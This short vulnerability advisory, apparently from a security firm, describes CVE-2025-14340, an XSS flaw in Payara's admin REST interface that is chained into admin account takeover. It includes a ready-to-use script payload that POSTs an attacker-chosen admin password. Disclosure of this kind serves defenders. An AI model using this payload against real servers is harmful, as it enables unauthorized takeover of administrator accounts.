# XSS to Admin account takeover (CVE-2025-14340) A Cross-Site Scripting vulnerability in Payara’s Administration Rest Interface, allows execution of attacker-controlled JavaScript leading to admin account take over. Because of: 1. The panel uses HTTP Basic Auth (credentials are sent automatically by the browser for same-origin requests). 2. The change-admin-password endpoint does not require the current password to update a user’s password. 3. The change-admin-password form does not have CSRF protection. 4. An injected script using the XSS in `/management/domain/version` can POST to `/management/domain/change-admin-password` and set an attacker-chosen password for any target account — resulting in administrator account takeover. #### Proof of Concept URL: `https://panel.example.com:4848/management/domain/version?<PAYLOAD>` PAYLOAD: ``` <script> fetch('/management/domain/change-admin-password', { method: 'POST', headers: { 'X-Requested-By': 'GlassFish REST HTML interface', 'Accept': 'text/html', 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang e-admin-password' }); </script> ``` ## Legal AUTHORIZED USE ONLY. DeepSecurity Perú does not endorse unauthorized access and takes no responsibility for any misuse of the information provided.